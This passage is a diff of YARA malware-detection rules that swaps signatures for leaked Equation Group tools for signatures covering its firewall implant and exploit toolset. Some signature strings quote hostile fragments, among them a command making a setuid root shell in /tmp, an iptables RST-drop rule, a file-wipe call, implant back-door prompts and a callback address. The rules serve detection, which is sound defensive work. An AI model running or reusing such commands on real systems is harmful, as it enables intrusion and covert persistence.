+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
-		$s2 = "right ^= (temp <<  16) & 0xffffffff" fullword ascii
-		$s3 = "tempresult = \"\"" fullword ascii
-		$s4 = "num = self.bytes2long(data)" fullword ascii
+		$x1 = "Implant Version-Specific Values:" fullword ascii
+		$x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii
+		$s1 = "createSendRecv: recv'd an error from the target." fullword ascii
+		$s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Ftshell : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen4 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
-		date = "2017-04-08"
+		id = "8b2061f0-862d-51de-a7d0-7a36d3e71d61"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L990-L1007"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1030-L1051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "84c646b2c81f870f650fafd26471017b00b3b7020e72390f818304958e694572"
+		logic_hash = "3bfcef33e9a0a1753fd21458ee3173284f98942d30a496c5183c79a7df960208"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
-		hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
+		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
 
 	strings:
-		$s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
-		$s2 = "processUpload" fullword ascii
-		$s3 = "global dothisreallyquiet" fullword ascii
+		$s1 = "Command has not yet been coded" fullword ascii
+		$s2 = "Beacon Domain  : www.%s.com" fullword ascii
+		$s3 = "This command can only be run on a PIX/ASA" fullword ascii
+		$s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii
+		$s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Store_Linux_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen3 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b88be148-5308-583a-b41e-2bea9b837e2a"
-		date = "2017-04-09"
+		id = "ec64bb2b-566b-50b6-a518-222afc88d400"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1018-L1033"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1053-L1076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f284c2fecee23f01f83e0534d7d56a88b102e6dcc02a26321fe246604dc8cb0e"
+		logic_hash = "32d4dd0e35ea480199f5b2032145326c3eef73243783c580605a4de6877df982"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
+		super_rule = 1
+		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
 
 	strings:
-		$s1 = "[-] Failed to map file: %s" fullword ascii
-		$s2 = "[-] can not NULL terminate input data" fullword ascii
-		$s3 = "[!] Name has size of 0!" fullword ascii
+		$x1 = "incomplete and must be removed manually.)" fullword ascii
+		$s1 = "%s: recv'd an error from the target." fullword ascii
+		$s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii
+		$s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Genkey : FILE
+rule SIGNATURE_BASE_EQGRP_BLIAR_BLIQUER : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb305be7-9e16-502e-89ca-a40bb6890404"
-		date = "2017-04-09"
+		id = "6f83bb11-f789-544e-8dca-c2dc2c845331"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1035-L1049"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1078-L1111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1d823e297b0b1f47f12a3240d59f5ecc482f1140e5b2962f76ec2fff719664a"
+		logic_hash = "59b7303dba0a79919d79627697a8724337145cd6d7b5c53cda970bf437162865"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
+		super_rule = 1
+		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
 
 	strings:
-		$x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
-		$x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
+		$x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii
+		$x2 = "There is no implant present on the firewall." fullword ascii
+		$x3 = "Implant Version :%lx%lx%lx" fullword ascii
+		$x4 = "You may now connect to the implant using the pbd idkey" fullword ascii
+		$x5 = "No reply from persistant back door." fullword ascii
+		$x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii
+		$p1 = "PBD_GetVersion" fullword ascii
+		$p2 = "pbd/pbdEncrypt.bin" fullword ascii
+		$p3 = "pbd/pbdGetVersion.pkt" fullword ascii
+		$p4 = "pbd/pbdStartWrite.bin" fullword ascii
+		$p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii
+		$p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii
+		$s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii
+		$s2 = "Could not get hook and jump addresses" fullword ascii
+		$s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii
+		$s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii
+		$s5 = "Invalid implant file" fullword ascii
 
 	condition:
-		( filesize < 3KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and ( 1 of ( $x* ) or 1 of ( $p* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cursetingle_2_0_1_2_Mswin32_V_2_0_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Sploit : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a1870ba-d600-5c11-8d3d-41395ad8be63"
-		date = "2017-04-09"
+		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1051-L1065"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1113-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bc27edc946beb5065d4fe43e53a33b448c24c7dd3eae0cedd4770c02fce7836b"
+		logic_hash = "083f103dee6b209626c4d790dff0e53af757945ded63409b26bbe143c78e30eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
+		super_rule = 1
+		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+		hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$s2 = "0123456789abcdefABCEDF:" fullword ascii
+		$s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii
+		$s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" fullword ascii
+		$s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" fullword ascii
+		$s4 = "exp.load_vinfo()" fullword ascii
+		$s5 = "if not okay and self.terminateFlingOnException:" fullword ascii
+		$s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii
+		$s7 = "if self.terminateFlingOnException:" fullword ascii
+		$s8 = "print 'Debug info ','='*40" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x2123 and filesize < 90KB and 1 of ( $s* ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cursesleepy_Mswin32_V_1_0_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f60ff218-1cb7-5f44-a756-1ee67649e6a6"
-		date = "2017-04-09"
+		id = "58b0b51d-d1f8-5ee2-a4af-491c49dd0573"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1067-L1082"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1137-L1168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dcbf2b314ff9c392ae0cb4f14762dd20c6b85f7f547af683db3aea1c57dee57"
+		logic_hash = "c3cbe11ae38f5affffab247cdc618d0afb5a0feda6ea4b2f43dd8edb2fbf2b11"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "A}%j,R" fullword ascii
-		$op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 }
-		$op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 }
+		$x1 = "Modules persistence file written successfully" fullword ascii
+		$x2 = "Modules persistence data successfully removed" fullword ascii
+		$x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii
+		$s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii
+		$s2 = "Error while attemping to persist modules:" fullword ascii
+		$s3 = "Error while reading interface info from PIX" fullword ascii
+		$s4 = "LP.c:pixFree - Failed to get response" fullword ascii
+		$s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" fullword ascii
+		$s6 = "Unable to fetch config address for this OS version" fullword ascii
+		$s7 = "LP.c: interface information not available for this session" fullword ascii
+		$s8 = "[%s:%s:%d] ERROR: " fullword ascii
+		$s9 = "extract_fgbg" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cursehelper_Win2K_I686_V_2_2_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen1 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c24aa6a-74ab-5832-876b-5cab43dc6bb7"
-		date = "2017-04-09"
+		id = "af0a1a2c-0efb-568f-9e80-baee7398fea2"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1084-L1100"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1170-L1199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f6c92fc3540750a1223682b1672575b3a3120f5ebf63190a9b31d7e4e5ce13c7"
+		logic_hash = "1493f78e74503c367e3c5d8eac32167a7ad34d2435eba00e1f7bf864682e10a5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7"
+		hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
-		$op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 }
-		$op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff }
+		$s1 = "WARNING:  Session may not have been closed!" fullword ascii
+		$s2 = "EXEC Packet Processed" fullword ascii
+		$s3 = "Failed to insert the command into command list." fullword ascii
+		$s4 = "Send_Packet: Trying to send too much data." fullword ascii
+		$s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii
+		$s6 = "Wrong Payload Size" fullword ascii
+		$s7 = "Unknown packet received......" fullword ascii
+		$s8 = "Returned eax = %08x" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Addkey : FILE
+rule SIGNATURE_BASE_EQGRP_Eligiblebombshell_Generic : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a025e379-c24e-56ac-b53c-bd38d51f3437"
-		date = "2017-04-09"
+		id = "7abe53f6-9880-523a-b71f-6e3850047764"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1102-L1117"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1201-L1218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec5b7499e3c3cc6b581c381ae61a4c987691c0d93dd589a5907fd7419335963a"
+		logic_hash = "a2e13300736f99aff30c7b4f7f0b148d62ecb1e72435a3e15e4f85b30d904ffd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
+		super_rule = 1
+		hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+		hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
 
 	strings:
-		$x1 = "print '  -s storebin  use storebin as the Store executable\\n'" fullword ascii
-		$x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
-		$x3 = "print '  -k keyfile   the key text file to inject'" fullword ascii
+		$s1 = "logging.error(\"       Perhaps you should run with --scan?\")" fullword ascii
+		$s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii
+		$s3 = "\"be supplied\")" fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		( filesize < 70KB and 2 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Noclient_3_3_2 : FILE
+rule SIGNATURE_BASE_EQGRP_Ssh_Telnet_29 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be7c4263-e8e3-5a83-9003-063225e544ff"
-		date = "2017-04-09"
+		id = "cc6edf63-f7ef-579a-82c5-28e5012561e0"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1119-L1136"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1220-L1241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14b1f135da81fd9a071e0f692bc7f1ab6f6f63d7dd05e1557e5c2d51135727b6"
+		logic_hash = "e93a54f4de089d460bfb966feacc377c0467863f481a210c81970f4909fb3bd8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
+		super_rule = 1
+		hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
+		hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
 
 	strings:
-		$x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
-		$x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
-		$x3 = "noclient: failed to execute %s: %s" fullword ascii
-		$x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
-		$s5 = "Attempting connection from 0.0.0.0:" ascii
+		$s1 = "received prompt, we're in" fullword ascii
+		$s2 = "failed to login, bad creds, abort" fullword ascii
+		$s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii
+		$s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii
+		$s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
+		$s6 = "received arp - EPBA: ok, payload: fail" fullword ascii
+		$s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii
 
 	condition:
-		( filesize < 1000KB and 1 of them )
+		( filesize < 10KB and 2 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Curseflower_Mswin32_V_1_0_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Tinyexec : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - from files tinyexec"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4138f87a-4584-5efc-a168-633838893e2f"
-		date = "2017-04-09"
+		id = "b783bafd-52e2-59e8-98ab-47de3250415e"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1138-L1153"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1245-L1258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e70954945b3a5e08e5ae216b16702056b403dbf14391276eae1ed13e8273c1ee"
+		logic_hash = "19b8d7e946d72424f81cd48ad4bf8791bf50a4cc146866e55ad501443a8d1e45"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
 
 	strings:
-		$s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
-		$op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 }
+		$s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 }
+		$s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint32( 0 ) == 0x464c457f and filesize < 270 and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Tmpwatch : FILE
+rule SIGNATURE_BASE_EQGRP_Callbacks
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - Callback addresses"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c8cac7a-761f-59f4-bc04-285af4dbe184"
-		date = "2017-04-09"
+		id = "dd1fbe09-4def-562d-825d-e790dc2c3dd9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1155-L1169"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1260-L1272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6fab5100f6ee0bf9a4e13e262c8d47e600f5aad64c7e04fe08fa42a5d78c38e8"
+		logic_hash = "34881cf8f9f29482a1e129f0f61470d4cc3fa6b78b9f6dda25862371896deca7"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
 
 	strings:
-		$s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
-		$s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
+		$s1 = "30.40.50.60:9342" fullword ascii wide
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Orleans_Stride_Sunos5_9_V_2_4_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Extrabacon_Output
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - Extrabacon exploit output"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec83e1c0-91a9-5f9d-a1d2-94be725bc05a"
-		date = "2017-04-09"
+		id = "b2070ed7-e95a-534a-8f27-63c5ca9251b4"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1171-L1186"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1274-L1290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1380b22e661926ebb2878d89c80e115a58d0bfc060681a55564c97c1e9f36765"
+		logic_hash = "5e71a4380dd30e68d89add1718976d3207a161d2d61fd4c3250fc4b10a0f53a0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
 
 	strings:
